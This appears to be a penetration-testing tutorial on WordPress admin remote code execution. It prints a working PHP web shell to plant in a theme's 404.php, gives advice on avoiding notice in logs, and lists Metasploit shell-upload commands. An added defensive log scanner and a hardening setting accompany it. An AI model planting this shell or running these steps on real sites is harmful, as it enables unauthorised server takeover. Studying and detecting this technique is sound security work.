WordPress Admin RCE


With sufficient privileges, it is possible to exploit a remote code execution (RCE) vulnerability on WordPress.

Since admins can modify theme templates, and templates are PHP files, we can replace one of them with our own code, for instance a web shell, which gives us remote command execution (RCE).

Select Appearance, then Theme Editor. Select a theme, preferably one that is not active, to avoid breaking the site.

Pick a non-critical file such as 404.php and add to it a web shell or directly use a reverse shell:

<?php
// add your webshell
echo "<pre>".shell_exec(($_GET['cmd'] ?? "whoami")." 2>&1")."</pre>";
// prevent the rest of the template from rendering
// ⚠️ remove this line if the page breaks
exit;

To execute it, rather than requesting a non-existent URL to trigger the 404 page (which may stand out in the logs), access the file directly from the theme folder:

https://<HOST>/wp-content/themes/<theme_name>/404.php
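From the defender's side, as an added example that is not part of the original page: a small Python scanner over constructed access-log lines that flags the two traces this technique leaves, POSTs to the theme editor and direct requests to PHP files under wp-content/themes, in particular with the cmd parameter used in the shell above. The log lines, IPs and theme name are constructed sample data.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed combined-format access log lines (sample data, not from a real server).
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:10:01:02 +0000] "GET /wp-content/themes/twentytwenty/style.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2024:10:01:10 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2024:10:01:30 +0000] "GET /wp-content/themes/twentytwenty/404.php?cmd=id HTTP/1.1" 200 312 "-" "curl/8.0"
10.0.0.5 - - [12/May/2024:10:02:00 +0000] "GET /wp-content/themes/twentytwenty/assets/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2024:10:02:15 +0000] "GET /wp-content/themes/twentytwenty/404.php HTTP/1.1" 200 312 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Theme PHP files are included by WordPress itself; a browser fetching one directly is unusual.
THEME_PHP_RE = re.compile(r"^/wp-content/themes/[^/]+/.*\.php$", re.IGNORECASE)


def classify(line):
    """Return (ip, reason) when the log line matches a theme-editor abuse pattern, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target = m.group("ip"), m.group("method"), m.group("target")
    parsed = urlparse(target)
    path = parsed.path
    # Every save in the Theme Editor is a POST to theme-editor.php; each one is worth reviewing.
    if method == "POST" and path.endswith("/wp-admin/theme-editor.php"):
        return ip, "theme file modified via theme editor"
    if THEME_PHP_RE.match(path):
        if "cmd" in parse_qs(parsed.query):
            return ip, f"direct theme PHP access with command parameter ({path})"
        return ip, f"direct request to theme PHP file ({path})"
    return None


def scan(log_text):
    """Run classify() over every line and keep the hits, in log order."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(f"{ip}: {reason}")
```

Pairing these alerts with `define('DISALLOW_FILE_EDIT', true);` in wp-config.php, which removes the Theme Editor entirely, closes this path for compromised admin accounts.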

Metasploit Module

You can use Metasploit's wp_admin_shell_upload module, but it is quite unreliable.

$ msfconsole -q
msf6> use wp_admin_shell_upload
msf6> set USERNAME username
msf6> set PASSWORD password
msf6> set RHOSTS IP
msf6> set LHOST tun0
msf6> run

Some options you might want to set:

msf6> set WPCHECK yes # set to false if the WordPress fingerprint check fails on a real WordPress site
msf6> set httptrace true
msf6> set TARGETURI /wordpress/
msf6> run